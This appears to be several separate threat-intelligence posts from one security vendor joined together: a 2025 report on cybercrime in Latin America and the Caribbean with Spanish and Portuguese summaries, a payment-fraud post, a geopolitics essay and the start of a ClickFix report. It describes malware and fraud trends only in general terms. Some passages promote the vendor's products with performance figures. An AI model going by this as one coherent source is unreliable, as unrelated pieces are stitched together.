Throughout 2025, Insikt Group observed threat actors targeting the LAC region by compromising remote desktop protocol (RDP), VPNs, and web admin panels, and obtaining credentials from prior infostealer infections, password reuse, brute-force attacks, and other initial access points. Based on data within the Recorded Future Intelligence Operations Platform, there are approximately 29,000 references to exposed LAC-related credentials on Russian Market. These exposed credentials are from domains belonging to the top organizations (by revenue) in the healthcare, government, and financial sectors across the five largest economies in LAC. Russian Market is one of the leading dark web marketplaces for the sale and distribution of infostealer logs. Most of these logs were from LummaC2 and then Acreed Stealer, consistent with what Insikt Group observed in its review of additional infostealer logs. It should be noted that many of the 29,000 exposed credentials are likely customers of these organizations and not necessarily employees, as Recorded Future does not have access to internal-facing employee domain addresses to search for exposed credentials; however, those can be added by an end user. Insikt Group assesses that these attack vectors were likely effective for infiltrating the systems of targets in the LAC region due to increased remote work adoption, legacy infrastructure in many public institutions, and limited monitoring and resources. Insikt Group observed threat actors advertising carding tools, bulk SMS/Email blasting, SIM swapping, hacking assistance, and other similar services on Telegram channels.

In 2025, Insikt Group observed a rise in novel types of malware that actively leverage and exploit NFC. First identified by Threat Fabric, PhantomCard is an Android trojan, notably a variant of China-origin NFC relay malware-as-a-service (MaaS), primarily targeting banking customers in Brazil. PhantomCard enables relay attacks by obtaining NFC data from a victim's banking card and transmitting it to a threat actor's device to perform transactions at point-of-sale (POS) systems or ATMs. PhantomCard is distributed via malicious webpages that impersonate legitimate applications, prompting victims to tap their cards and enter their personal identification numbers (PINs) for authentication. Once credentials are fraudulently obtained, they are relayed to attackers.
Similarly, in late 2025, threat actors deployed RelayNFC, a mobile malware that targets contactless payment cards, in a phishing campaign targeting Brazilian users. This evolution in TTPs parallels the shift by threat actors from skimming magnetic stripe data to “shimming” Europay, Mastercard, and Visa (EMV) chip data in the payment fraud ecosystem, since unique cybercriminal solutions typically follow new security innovations.

Per the 2025 Cybercriminal Cryptocurrency Annual Activity Report, Insikt Group consistently observed activity in which cryptocurrency wallets were targeted by various forms of malware, such as drainers, clippers, and miners, to steal funds. Given the persistent lag in cybersecurity measures in LAC and the rapid growth of the cryptocurrency market in the LAC region, its users may become attractive targets for cybercriminals. The top five countries in the LAC region that dominate the cryptocurrency ecosystem are Brazil, Argentina, Mexico, Venezuela, and Colombia. However, Brazil is the clear leader, accounting for a third of overall cryptocurrency activity. Insikt Group assesses that, as the mainstream adoption of cryptocurrency continues, threat actors will likely seek targets in these countries, as knowledge and security practices among the user base in these regions will likely be lacking. Additionally, as with threat actors in other regions of the world, those targeting LAC will almost certainly leverage this medium of exchange to transact and launder illicit funds. As countries continue to adopt new regulations and introduce new forms of cryptocurrency, we expect threat actors to identify new vectors for exploitation. As of 2025, Argentina, Brazil, Colombia, Ecuador, Paraguay, Trinidad and Tobago, Uruguay, and Venezuela are participating in INTERPOL’s inaugural pilot phase for the new Silver Notice, which will be published to “help trace and recover criminal assets, combat transnational organized crime and enhance international police cooperation,” likely including cryptocurrency assets if linked to criminal proceeds.

Advanced Persistent Threats (APTs) and Cybercrime

Throughout 2025, Insikt Group observed a rise in APT activity targeting the LAC region using traditional cybercriminal methods, such as phishing and ransomware. This suggests some APT groups may also have financial motivations extending beyond seeking strategic geopolitical influence. Prominent APTs, such as Dark Caracal, conducted cyber espionage and delivered the Poco RAT via financial-themed phishing. TAG-144 (Blind Eagle) primarily targeted government entities in South American countries, notably Colombia, using TTPs such as spearphishing and remote access trojans (RATs) in campaigns blending espionage and financial motives.

Insikt Group assesses that some Chinese state-sponsored activity is likely aimed at protecting economic investments in the region, such as the Belt and Road Initiative (BRI), sovereign loans, and widespread commercial interests. In addition to the above APT groups, Chinese state-sponsored groups are also targeting entities in LAC countries. TAG-141 (FamousSparrow) leveraged SparrowDoor malware against entities in Mexico, Argentina, and Chile. Storm-2603 (Gold Salem) deployed ransomware, including Warlock, LockBit, and Babuk, targeting multiple sectors across agriculture, government, energy and natural resources, and telecommunications in the LAC and Asia-Pacific (APAC) regions. This activity may signal that China is seeking to retain influence in the LAC region through cybercriminal means or is interested in financial gain.

Hacktivism

The LAC region has repeatedly experienced periods of complex political and social unrest fueled by debates regarding economic reforms, corruption, and inequality. Unlike financially motivated cybercrime, hacktivism tends to be political or ideological, and these tense conditions can create an environment where hacktivism spikes. In late 2025, Insikt Group noticed increased activity from Chronus Team, a hacktivist group known for defacement attacks and data leaks aimed at exposing security vulnerabilities, primarily targeting organizations in Mexico. The threat group leverages Telegram channels for communication and propaganda. It has loosely aligned with other hacktivist and cybercriminals groups, such as Elite 6-27 and Sociedad Privada 157, to gain attention and increase its reputation. Insikt Group observed another trend where several hacktivist groups began transitioning to ransomware-as-a-service (RaaS) for financial gain. One such hacktivist group, “FiveFamilies”, functions as a collective of several groups; some of their targeted entities included those located in Cuba and Brazil.

Figure 1: Chronus Team hack and web defacement of the website for the budget transparency for the municipality of Hermosillo, Sonora, Mexico (Source: Social Media)

Malware Trends

In 2025, Insikt Group observed elevated ransomware activity targeting organizations in the LAC region. Additionally, banking trojans also remained a prominent issue affecting LAC countries, with Insikt Group noting an uptick in campaigns specifically leveraging WhatsApp for delivery. Infostealers remained a popular initial access enabler in the LAC region. Botnets have grown in the region largely due to small office/home office (SOHO) devices, such as routers and other internet-of-things (IoT) appliances with weak security, outdated firmware, and a reliance on default credentials. Botnet activity can contribute to credential theft, the propagation of phishing campaigns, the distribution of spam, the takeover and abuse of residential IP addresses, and the enabling of distributed denial-of-service (DDoS) attacks. Insikt Group also observed threat actors targeting payment terminals in 2025 with ATM and POS malware.

Ransomware

In 2025, Recorded Future’s Global Ransomware Landscape Dashboard recorded 452 ransomware incidents impacting the LAC region out of 7,346 total globally, based on all publicly known ransomware victims listed on associated ransomware blogs. Attacks on entities in the LAC region constituted just over 6% of all global ransomware attacks in 2025. The top five industries most impacted by ransomware in the LAC region in 2025 were Healthcare (36 attacks), Manufacturing (49 attacks), Government (28 attacks), Information Technology (21 attacks), and Education (20 attacks), as demonstrated in Figure 3. Insikt Group research on ransomware in the LAC region covers 27 of the 33 constituent countries. Insikt Group did not obtain ransomware data from Antigua and Barbuda, Belize, Cuba, Saint Kitts and Nevis, Saint Lucia, or Suriname in 2025.

Figure 2: Global Ransomware Landscape Dashboard view of attack metrics for the top five ransomware groups impacting LAC in 2025 (Source: Recorded Future)

Figure 3: Global Ransomware Landscape Dashboard view of attack metrics for the top five most impacted industries in LAC in 2025 (Source: Recorded Future)

Insikt Group observed an increase in ransomware activity across all major industries in LAC compared to the prior year. Insikt Group specifically examined ransomware attacks against financial, government, and healthcare entities across the LAC region and identified the following: 16 attacks targeting the finance sector, 28 attacks targeting the government sector, and 36 attacks targeting the healthcare sector. Appendix C highlights a sample of these ransomware attacks.

Regarding LAC countries, the top five countries most impacted by ransomware in the LAC region in 2025 were Brazil (128 attacks), Mexico (78 attacks), Argentina (63 attacks), Colombia (51 attacks), and Peru (27 attacks). These countries are among the largest economies in the region, which may lead to downstream spillover effects for enterprises that conduct business directly with them or with neighboring countries. Insikt Group found that the majority of ransomware groups leverage double extortion. This extortion technique involves encrypting a victim’s data, exfiltrating the data, and then threatening to publicly leak the data on the ransomware group’s name-and-shame blog if a ransom is not paid. Recorded Future assesses countries by network intrusion and ransomware targeting risk every quarter to provide awareness and help organizations assess risk exposure. Takeaways from the top five impacted countries based on metrics and analysis from Recorded Future include:

• Brazil’s network intrusion risk score increased from Medium to Very High, and Brazil’s ransomware targeting risk score remained Medium by the end of 2025. Brazil was the most targeted country in LAC and among the top ten countries worldwide impacted by ransomware in 2025, with a total of 130 victims.
• Mexico’s network intrusion risk score increased from Very Low to Low, and Mexico’s ransomware targeting risk score increased from Low to Medium at the end of 2025. Notably, data was leaked relating to a Mexican government entity on the dark web name-and-shame extortion website, Tekir Apt Data Leak Site.
• Argentina’s network intrusion risk score increased from Very Low to Low, and Argentina’s ransomware targeting risk score increased from Low to Medium at the end of 2025. Insikt Group observed that Argentina was targeted by a new rust-based ransomware “RALord”.
• Colombia’s network intrusion risk score increased from Low to High, and Colombia’s ransomware targeting risk score remained low with no observed changes at the end of 2025. Colombia’s financial sector was impacted by the ransomware group Crypto24, which posted victims' names on its blog.
• Peru’s network intrusion risk score increased from Very Low to Low, and Peru’s ransomware targeting risk score was low with no observed changes at the end of 2025. A pharmaceutical company headquartered in Peru was named as a victim on the Dire Wolf Blog.

Figure 4: Global Ransomware Landscape Dashboard view of the most affected countries in LAC in 2025 (Source: Recorded Future)

Banking Trojans

According to the Global System for Mobile Communications Association (GSMA), in 2024, approximately 64% of the LAC population used mobile internet; it is projected that this will increase to nearly three-quarters by 2030. Increasing internet penetration and high cell phone subscription rates in LAC signify a rising reliance on mobile devices, likely making them more appealing targets for threat actors. Android remains the predominant operating system (OS) of mobile devices in South America with an 84.59% market share. Android devices may support more sideloaded applications (links and Android application packages [APKs] from social media or third-party stores) than Apple iOS, which typically has tighter ecosystem controls, and Android users may be running older OS versions, thereby making Android devices attractive targets for cybercriminals. The Android ecosystem grants developers more freedom to list apps within the Google Play Store, and the vetting and verification process is less stringent, allowing malicious APK domain mirrors to go undetected. In LAC, users may rely on mobile phones as their primary or only computing device, making them desirable initial access points for threat actors to deploy Android-based malware. According to the World Bank's Global Findex 2025 report, 37% of adults in the LAC region had a mobile money account as of 2024. Mobile banking, digital wallets, and QR payments are commonplace in the area. Based on the World Bank’s findings, Insikt Group assesses that persistent mobile banking malware targeting LAC is likely driven by rapid digital banking integration that has outpaced security controls and the expansion of MaaS ecosystems. Sophisticated localized social engineering attacks and disproportionate regional enforcement capacity are further accelerating this trend within LAC’s ever-evolving mobile financial landscape.

Insikt Group research reflected an increase in banking trojans targeting the WhatsApp platform in 2025. Brazilian authorities have, in recent years, focused their attention on disrupting banking trojans. A significant amount of crimeware in LAC consists of mobile banking trojans, though similar in many ways, they are not a monolith and differ in unique ways. Insikt Group analysis from 2025 reflects that, despite some law enforcement disruptions, banking trojans are still a prominent issue in the LAC region and will likely continue to be in 2026. Appendix D highlights the most active banking trojans across the LAC region in 2025.

Infostealers

Infostealers pose a persistent threat worldwide, and the LAC region is no exception. Insikt Group analyzed a small sample of the domains belonging to the top organizations (based on revenue) in the healthcare, government, and financial sectors across the top five largest economies in LAC. Analysis showed that the most prominent infostealer threats observed in 2025 were LummaC2, Vidar, Rhadamanthys, RedLine, and Nexus. This is despite multiple law enforcement operations under Operation Endgame conducting takedowns impacting Rhadamanthys and LummaC2.

Figure 5: Infostealers infection trends in 2025 for the domains belonging to the top organizations (based on revenue) in the healthcare, government, and financial sectors for countries with the top five largest economies in LAC (Source: Recorded Future data)

LummaC2 was undoubtedly the most active infostealer targeting entities in the LAC region despite being targeted by law enforcement. LummaC2 has been discussed in several news sources and Telegram chatter as targeting users in Argentina, Paraguay, and Mexico. Cybercriminals deploy LummaC2 to obtain victim credentials to carry out financial fraud and cryptocurrency theft. Insikt Group conducted research into LummaC2 affiliates and identified a likely Mexico-based threat actor operating under multiple aliases linked to Lumma build ID “re0gvc”. In mid-2025, law enforcement took measures to disrupt LummaC2; the operation effectively led to the takedown of approximately 2,300 malicious domains integral to LummaC2’s infrastructure, Lumma’s central command, and associated criminal marketplaces. Shortly after this operation, it appears LummaC2 still had infected victims in several countries, including Brazil and Colombia, likely because sinkholing requires some time to have a noticeable effect as it redirects traffic but does not automatically clean infected machines. More complete remediation would require patching and malware removal on affected systems, which is challenging to implement at scale when infected devices are spread across the world. However, Insikt Group observed a significant decrease in credentials exposed by LummaC2 in the second half of 2025, likely due to the success of the joint Microsoft and law enforcement operation, as well as the main threat actor being banned from Exploit.

Figure 6: LummaC2 infection trends in 2025 for the domains belonging to the top organizations (based on revenue) in the healthcare, government, and financial sectors for countries with the top five largest economies in LAC (Source: Recorded Future data)

In the wake of the LummaC2 operation, Recorded Future detected an increase in Vidar infections during the latter half of 2025. This increase highlights threat actors’ ability to migrate between infostealers to facilitate their criminality despite disruptions.

Figure 7: Vidar Infection trends in 2025 for the domains belonging to the top organizations (based on revenue) in the healthcare, government, and financial sectors for countries with the top five largest economies in LAC (Source: Recorded Future data)

Botnets

Botnet activity has grown steadily in the LAC region, enabling financial fraud, spam distribution, credential harvesting, initial access for ransomware and large-scale DDoS attacks targeting financial and government institutions. Botnets remained a priority for international law enforcement in 2025. For example, the ongoing Operation Endgame aims to hinder threat actors' remote-control capabilities by dismantling ransomware and other malware infrastructure. Emerging in late 2025, Kimwolf, also known as AISURU, is a botnet that targets compromised streaming devices. News reporting and dark web chatter indicate many of the devices infected with Kimwolf are based in Brazil, India, the US, and Argentina. Additional reporting suggests a threat actor involved with the AISURU botnet is likely based in Brazil. Horabot is a malware family and type of botnet first identified in June 2023, targeting Spanish-speaking users in six LAC countries: Mexico, Guatemala, Colombia, Peru, Chile, and Argentina. Horabot uses invoice-themed phishing emails to gain initial access to victims' systems.

Payment Terminal Malware

Threat actors also continued to target payment infrastructure for financial gain. ATM malware activity has continued to rise in LAC, with some experts noting ATM malware attacks have spiked by 46% across LAC in 2025. For instance, Ploutus is a sophisticated malware family first detected in Mexico in 2013, which compromises ATMs by issuing unauthorized commands to their cash dispensing modules. In December 2025, the US Department of Justice indicted 54 individuals associated with the Venezuelan gang Tren de Aragua (TDA) for participation in a massive ATM jackpotting scheme that exploited Ploutus malware. Moreover, the POS malware MajikPOS, designed to infiltrate systems connected to POS terminals and extract magnetic stripe payment data from bank cards, remained an active threat to companies operating in Brazil.

Mitigations

• Use Recorded Future’s Global Ransomware Landscape Dashboard: Recorded Future customers can proactively mitigate this threat by operationalizing the Recorded Future Global Ransomware Landscape Dashboard and leveraging the victimology tab to filter based on ransomware group, country, and industry of interest. Recorded Future customers can customize their own ransomware risk profile and establish alerts that align with their risk priorities.
• Use Recorded Future’s Threat and Third-Party Risk Monitoring: Configure alerts in the Recorded Future Intelligence Cloud to track activity across Telegram channels, darkweb forums, and other platforms for proactive awareness. Use the Third-Party Intelligence module to assess risk exposure for current and future partnerships.
• Update Legacy Systems: Threat actors, whether opportunistic or financially motivated, or both, often seek to exploit vulnerable systems. Organizations that rely on outdated technology stacks leave themselves exposed to preventable cyber threats and attacks.
• Engage in Public-Private Information Sharing: To bolster regional collaboration and establish standardized best practices, coordinate with law enforcement, and create intelligence-sharing channels to enhance investigations and decrease incident response times.
• Generate Awareness through Education: Advocating for digital literacy through university partnerships and scholarship in the LAC region will encourage good cyber hygiene and prepare for a stronger, more competent workforce. Enterprises can implement mandatory cybersecurity training during new hire onboarding and establish routine drills to ensure protocols are followed.

Outlook

Insikt Group has highlighted the most salient cybercriminal trends and methods observed throughout the LAC region in 2025. Threat actors conducted phishing and credential theft to gain and sell initial access to LAC organizations while often relying on dark web forums and end-to-end encrypted messaging platforms to communicate and monetize compromised data and access methods. Cybercriminals carried out elevated ransomware attacks against the healthcare, government, finance, and other critical sectors. Banking trojan and infostealer activity persisted throughout LAC despite law enforcement disruption attempts. Cybercriminals have proven to be adaptive and resilient, often capitalizing on immature or emerging businesses that lack the skills, tools, and personnel to prevent attacks. Small and medium-sized enterprises (SMEs) constitute over 95% of all businesses in LAC. SMEs are desirable targets for cybercriminals because they typically have limited resources and expertise, lack robust infrastructure, and have a high overreliance on third-party platforms. Insikt Group trend analysis supports these findings.

Absent regional harmonization of cybersecurity policies and best practices, LAC countries will likely continue to use fragmented incident response approaches, complicating cross-border cooperation and collaboration. For effective and sustainable protection of systems and information against cyber threats, LAC countries should focus on working together to establish standardized risk assessments and reporting mechanisms, protocols for information sharing to bolster timely remediation, and implement proactive “secure by design” principles. Possible approaches to accomplishing this may include increased investment in workforce development, participation in public-private partnerships, and the establishment of centralized cybersecurity management systems. Despite the lack of prominent Spanish- and Portuguese-language forums, it is likely that threat actors will continue to leverage traditional platforms and methods similar to those used by the English- and Russian-speaking cybercriminal underground. Based on current and historical data, we anticipate these trends will continue, and LAC will likely remain a popular target for ransomware groups and a hotspot for mobile malware in 2026.

Appendix A: Sample Listing of Posts Targeting Entities in LAC Countries on Dark Web and Special Access Forums

(Source: Recorded Future)

Appendix B: Sample Metrics of the Top Five Ransomware Groups Impacting LAC in 2025

(Source: Recorded Future)

Appendix C: Sample Data of Ransomware Incidents Impacting Healthcare, Government, and Financial Sectors in LAC Countries in 2025

(Source: Recorded Future)

Appendix D: Trends from the Most Active Banking Trojans in LAC in 2025

(Source: Recorded Future)

Este informe brinda un resumen de las tendencias y los desarrollos en el ecosistema cibercriminal de América Latina y el Caribe (LAC) en 2025. Insikt Group identificó que los actores maliciosos que operan en la región de LAC o que la tienen como objetivo utilizan principalmente aplicaciones cliente-servidor y plataformas de mensajería con cifrado de extremo a extremo como Telegram, así como foros de la dark web y de acceso especial en inglés o ruso, para comunicarse y llevar a cabo sus actividades. Los actores maliciosos demuestran una mayor sofisticación en sus operaciones, ya que adaptan sus tácticas, técnicas y procedimientos (TTP) con el tiempo, pero siguen apoyándose principalmente en métodos tradicionales como el phishing y la ingeniería social, la distribución de malware, y el ransomware. A partir de nuestros análisis, determinamos que Brasil, México y Argentina son los países más atacados por cibercriminales financieros, probablemente porque son las economías más grandes de la región de LAC. Además, a partir de esta investigación, Insikt Group determinó que los actores maliciosos a menudo atacan industrias críticas, como las de salud, finanzas y gobierno, porque poseen datos de alto valor, afrontan urgencias operativas y, a veces, utilizan sistemas antiguos que pueden ser vulnerables.

Principales hallazgos

• Insikt Group estima que el foro criminal DarkForums y la plataforma de mensajería Telegram son los principales medios de acceso especial utilizados por los actores maliciosos que operan en la región LAC o que la tienen como objetivo.
• Los actores maliciosos que operan en la región LAC o que la tienen como objetivo suelen estar impulsados por motivos financieros y, a menudo, utilizan la ingeniería social, el ransomware y diferentes formas de malware móvil para obtener acceso inicial a las instituciones gubernamentales, de salud o financieras.
• En 2025, Insikt Group registró 452 incidentes de ransomware que afectaron la región de LAC. Las cinco principales industrias afectadas fueron las de salud, fabricación, gobierno, tecnología de la información y educación; todas ellas observaron un aumento notable en los ataques en comparación con el año anterior.
• Insikt Group identificó que los actores maliciosos usan troyanos bancarios, especialmente las variantes más establecidas. En particular, estos actores usaron troyanos bancarios en campañas de smishing dirigidas a usuarios de WhatsApp con el objetivo de acceder a datos financieros y robar credenciales.
• Insikt Group identificó a LummaC2 como el ladrón de información (infostealer) más prolífico que afectó a organizaciones de la región LAC en el primer semestre de 2025, y a Vidar en el segundo semestre, tras la intervención de las fuerzas del orden contra LummaC2

Este relatório apresenta uma visão geral das tendências e desenvolvimentos no ecossistema do cibercrime na América Latina e Caribe (LAC) em 2025. O Insikt Group descobriu que os agentes de ameaças que operam na região da América Latina e Caribe (LAC) ou que a têm como alvo usam predominantemente aplicações cliente-servidor e plataformas de mensagens criptografadas de ponta a ponta, como o Telegram, bem como a dark web estabelecida em inglês ou russo e fóruns de acesso restrito, para se comunicarem e realizarem atividades. Os agentes de ameaças demonstram crescente sofisticação nas operações, adaptando táticas, técnicas e procedimentos (TTPs) ao longo do tempo, embora ainda dependam principalmente de métodos tradicionais, como phishing e engenharia social, distribuição de malware e ransomware. Com base na nossa análise, determinamos que Brasil, México e Argentina foram os países mais visados por cibercriminosos com motivação financeira, provavelmente por serem as maiores economias da América Latina e Caribe. Além disso, com base nesta pesquisa, o Insikt Group descobriu que os agentes de ameaças frequentemente visavam a setores críticos, como saúde, finanças e governo, pois esses setores detêm dados valiosos, enfrentam urgências operacionais e, às vezes, dependem de sistemas legados que podem ser vulneráveis.

Principais descobertas

• O Insikt Group avalia que o fórum criminoso DarkForums e a plataforma de mensagens Telegram são os principais fóruns de acesso restrito e plataformas de comunicação usados por agentes maliciosos que operam na região da América Latina e Caribe ou que têm essa região como alvo.
• Os agentes de ameaça que operam na América Latina e Caribe (LAC) ou que têm como alvo a região são geralmente motivados por interesses financeiros e frequentemente adotam engenharia social, ransomware e várias formas de malware em aparelhos móveis, a fim de terem acesso inicial a instituições governamentais, financeiras e de saúde.
• Em 2025, o Insikt Group registrou 452 incidentes de ransomware que afetaram a região da América Latina e Caribe. Os cinco setores mais afetados foram saúde, manufatura, governo, tecnologia da informação e educação, que registraram um aumento considerável nos ataques em comparação ao ano anterior.
• O Insikt Group continuou a identificar trojans bancários sendo usados por agentes de ameaças; os mais usados são as variantes já estabelecidas. Especificamente, os agentes maliciosos usaram trojans bancários em campanhas de smishing direcionadas a usuários do WhatsApp para terem acesso a dados financeiros e roubarem credenciais.
• O Insikt Group identificou o LummaC2 como o ladrão de informações (infostealer) mais prolífico, afetando organizações na América Latina e Caribe no primeiro semestre de 2025; e o Vidar no segundo semestre, após a desarticulação das atividades do LummaC2 pelas autoridades policiais.

It is increasingly sustained by an industrial support ecosystem: purpose-built infrastructure, packaged toolkits, and professionalized services that allow threat actors to maximize fraud output while minimizing the skill and effort required to execute attacks.

According to Recorded Future's Annual Payment Fraud Intelligence Report: 2025, this industrialization was driven by technical advances and increasingly professionalized support services.

The Magecart e-skimmer supply chain is the clearest example. Full-stack e-skimmer kits and Malware-as-a-Service (MaaS) offerings have made large-scale compromise of ecommerce websites accessible to less technically capable threat actors.

The "Sniffer by Fleras" kit, responsible for 26% of all e-skimmer infections observed in 2025, includes a web-based portal for generating malicious scripts and a management server for stolen data. The result was more than 10,500 unique Magecart infections active at some point during the year, likely compromising more than 23 million transactions.

Additionally, the "AcceptCar" e-skimmer, discovered in H2 2025, illustrates how far the service model has matured. Operators handle installation and operation on compromised e-commerce sites; in return, threat actors pay 50% of proceeds from card data sales or 70% of raw data intake. Using services like AcceptCar, fraud threat actors can participate in large-scale compromise operations without owning or managing any underlying infrastructure.

Figure 1: Line graph showing Magecart e-skimmer infections in 2025, by different groups, kits, and techniques. (Source: Recorded Future)

Purchase scam operations reflect a similar dynamic. Recorded Future Payment Fraud Intelligence identified more than 3,600 scam merchant accounts in 2025, up 2.5x from 2024, spanning at least 40 countries and 230 acquirers.

Recurring patterns in merchant registration data indicate that scam operators have standardized their merchant acquisition workflows, standing up fraudulent payment infrastructure at scale through repeatable, low-friction processes.

Card testing operates on the same service-economy logic. Telegram-based card testing services validated at least 27 million card records in 2025 through public-facing card generation and testing channels that any threat actor can access.

Among dark web checker services, over 1,350 legitimate merchant accounts were abused for card testing, with 94% not observed prior to 2025, suggesting systematic rotation to stay ahead of detection.

Figure 2: Graphic illustrating the purchase scam attack chain. (Source: Recorded Future)

The Ecosystem Is Concentrated Upstream

Notably, each of these industrialized attack vectors sits upstream of the fraudulent transaction. E-skimmer infections and scam merchants compromise card data during online purchases. Card testing validates that stolen data before it’s monetized.

"Fraud outcomes are visible, but the pathways that enable them are often not."

This industrialized scale across these attack vectors requires standardization, and standardization produces detectable patterns.

When 26% of e-skimmer infections trace back to a single kit, when scam operators reuse merchant registration patterns across hundreds of acquirers, when card testers rotate through predictable BIN attack workflows, the convergence that makes fraud scalable also makes it mappable. As that standardization deepens, a single indicator of compromise reaches further across the threat landscape.

That standardization creates something concrete: a window.

Magecart infections are active and identifiable before stolen card data is harvested.
Scam merchants often display detectable signals, including recent domain registration, merchant rotation, and merchant category code mismatches.

Card testing activity reveals when a monetization attempt is likely to occur.

Each stage represents an opportunity to act before fraud registers as a financial loss.

Transaction Monitoring Looks at the Wrong End of the Lifecycle

Transaction monitoring and behavioral fraud models are built to detect anomalies at the point of payment, like unusual spend patterns, velocity, and geographic inconsistencies. They do what they were designed to, but provide no visibility into the increasingly industrialized, pre-monetization stages that were built to avoid detection by these traditional processes.

Purchase scams are explicitly designed to circumvent transaction-based controls by manipulating cardholders into authorizing the fraudulent transaction themselves, making the payment appear legitimate by design.

Card testers cycle through new merchants specifically because historical tester merchants get flagged (94% of tester merchants identified in 2025 were not previously observed). A detection approach built around transaction signals will always be working with information that arrives after the upstream infrastructure has already done its job.

As the upstream ecosystem industrializes, the volume of activity that transaction monitoring cannot see has grown. With purchase scam detections more than quadrupling year-over-year and Magecart infections having likely compromised more than 23 million transactions in 2025 alone, the cost of that blind spot compounds.

Maintaining an effective fraud posture will increasingly require financial institutions to complement reactive account monitoring with proactive, intelligence-informed defenses.

How Recorded Future Payment Fraud Intelligence Addresses This

Recorded Future Payment Fraud Intelligence monitors each of the upstream stages discussed in this post.

With daily monitoring of Magecart-infected sites and enriched merchant data that integrates with transaction monitoring, Payment Fraud Intelligence can enable detection of high-risk merchants months before stolen card data appears for sale.

Additionally, the Scam Merchants dataset can identify fraudulent merchant accounts and their associated domains before customers are defrauded and before downstream card data reaches criminal markets.

Tester merchant monitoring surfaces card testing activity as an early signal of which portfolios are being targeted ahead of any monetization attempt.

Because Payment Fraud Intelligence monitors the sources, kits, and infrastructure that threat actors have increasingly standardized around, a single identified indicator can surface exposure across a portfolio at scale.

According to Recorded Future data, 75% of compromised cards are identified before fraud occurs, and 90% of compromised card assets are identified within hours of a breach.

The pre-monetization window will not narrow as the fraud ecosystem matures — if anything, the report's data suggests it will widen as standardization deepens. Financial institutions with visibility into that window can act before losses occur. Those without it will continue to respond after the fact.

Read the full Annual Payment Fraud Intelligence Report: 2025 to explore this year's findings in depth.

What is Quantum Geopolitics?

A useful analogy comes from physics.

Classical systems produce predictable outcomes. Quantum systems behave probabilistically, where interactions in one place can produce distant effects.

International politics increasingly resembles the latter.

The assumptions that shaped corporate strategy for decades—durable alliances, expanding globalization, and broadly coherent regulation—are weakening. Geopolitical shocks now move rapidly through tightly interconnected systems.

Four dynamics define how this system now behaves.

🌓 Superposition: Friends, Rivals, and Everything in Between

Countries can no longer be neatly categorised “ally” or “adversary.” They exist in overlapping states, with true alignment revealed only in moments of crisis.

States balance security partnerships with the West while maintaining economic ties with rivals. Turkey supports Ukraine diplomatically while sustaining trade flows that benefit Russia. India deepens defence ties with the United States even as it increases purchases of Russian oil.

Public statements offer limited guidance. Trade flows, enforcement patterns, and technology controls are more reliable indicators of intent.

For multinational firms, geopolitical positioning is no longer fixed. It is fluid.

🌀 The End of Guarantees: Promises Now Come with Caveats

Security commitments, trade access, and regulatory stability have shifted from certainties to probabilities.

Export controls can reroute supply chains within months. Sanctions regimes expand or unwind quickly. Even long-standing alliances depend on political will at the moment they are tested.

For businesses, this means long-term investments now carry elevated policy risk.

Leaders must plan for variance.

🧬 Quantum Entanglement: Local Conflicts Are Not Local

Global systems—financial, technological, logistical—are tightly coupled. Regional conflicts now generate immediate global effects.

Threats to Gulf commercial hubs disrupt international banking. Instability in the Strait of Hormuz drives energy price volatility and strains global shipping insurance. Cyber campaigns tied to the conflict target companies far beyond the region.

Disruption is rarely contained. Risk can no longer be managed by geography or function alone.

🔬 The Observer Effect: Whoever Sets the Rules First Wins

Influence increasingly derives from shaping rules rather than operating within them.

States that move early to establish standards in artificial intelligence, semiconductors, digital infrastructure, and financial regulation compel others to adapt.

Waiting for clarity can therefore be a strategic liability in itself.
If you do not shape the agenda, you become subject to it.

Why This Moment Feels Different

These dynamics are most visible in cyberspace, where geopolitical competition unfolds continuously below the threshold of open conflict.

State-sponsored actors operate inside corporate networks without triggering overt confrontation. Criminal groups, proxies, and intelligence services overlap, complicating attribution and response.

The boundary between geopolitical conflict and corporate exposure is now thin. A single breach can trigger regulatory scrutiny, customer loss, market volatility, and diplomatic tension at once.

Cybersecurity is no longer a technical function. It is a core enterprise risk.

How Security Leaders Should Respond

In a system governed by probabilities rather than predictability, security leaders must adapt how they think, allocate resources, and position their organizations.

1. Mindset Shift: Scenarios, Not Forecasts

Replace long planning horizons and static risk assessments with continuous scenario planning. Tools such as the Cone of Plausibility can stress-test responses to sanctions escalation, maritime disruption, regulatory fragmentation, or supply chain shocks.

Evaluate decision speed, cross-functional coordination, and response thresholds under pressure.
Adaptability matters more than accuracy.

2. Spending Shift: Invest in Resilience, Not Just Efficiency

Systems optimized solely for efficiency often lack resilience.

Diversifying suppliers, strengthening sanctions compliance, improving cybersecurity, and increasing visibility into third-party exposure can reduce vulnerability to geopolitical shocks.

Resilience is not a defensive expense; it is operational insurance.

3. Communication Shift: From Reporting to Action

Security leaders must translate geopolitical developments into clear decision frameworks before crises materialize.

This requires close coordination across legal, finance, and operations, as well as proactive engagement with regulators and industry partners.

Speed and clarity determine whether the organization shapes outcomes or reacts to them.

Final Thoughts

The Iran conflict offers a preview of what comes next. Alliances are conditional. Economic pressure, cyber activity, and regulatory responses unfold simultaneously.

Quantum geopolitics does not eliminate strategy. It demands a different kind—one built on scenario readiness, structural resilience, and faster decision cycles.

Leaders who wait for clarity will move too late.

Those who organize for uncertainty will operate ahead of it.

To access the latest Insikt Group® research click here.

Insikt Group® helps Recorded Future secure our world with threat intelligence. With deep experience in government, law enforcement, military, and intelligence agencies, we power the Recorded Future Platform with analyst-validated data, analytics, along with cyber and geopolitical intelligence. This enables our customers to reduce risk and prevent disruption.

Insikt Group identified five distinct clusters leveraging the ClickFix social engineering technique to facilitate initial access to host systems. Observed since at least May 2024, these clusters include those impersonating financial application Intuit QuickBooks and the travel agency Booking.com. Insikt Group leveraged the Recorded Future® HTML Content Analysis dataset, which enables systematic monitoring of embedded web artifacts to identify and track new malicious domains and infrastructure.

The clusters demonstrate significant operational variance in lure themes and infrastructure patterns, and highlight the technique's evolution, moving past simple verification by visually fooling victims with various fake challenges and demonstrating technical sophistication through operating system detection to tailor execution chains. Despite these structural differences, its operation is largely the same, showing that ClickFix’s core techniques work across platforms and only the social engineering lure needs to be adapted to the victim. Threat actors manipulate victims into executing malicious, obfuscated commands directly within native system tools like the Windows Run dialog box or macOS Terminal.

This living-off-the-land (LotL) approach allows malicious scripts to execute in-memory, effectively bypassing traditional browser security and endpoint controls. Parallel clusters targeting sectors as diverse as accounting, real estate, and legal services indicates that ClickFix has transitioned into a standardized, high-ROI template for both cybercriminal and potentially advanced persistent threat (APT) groups.

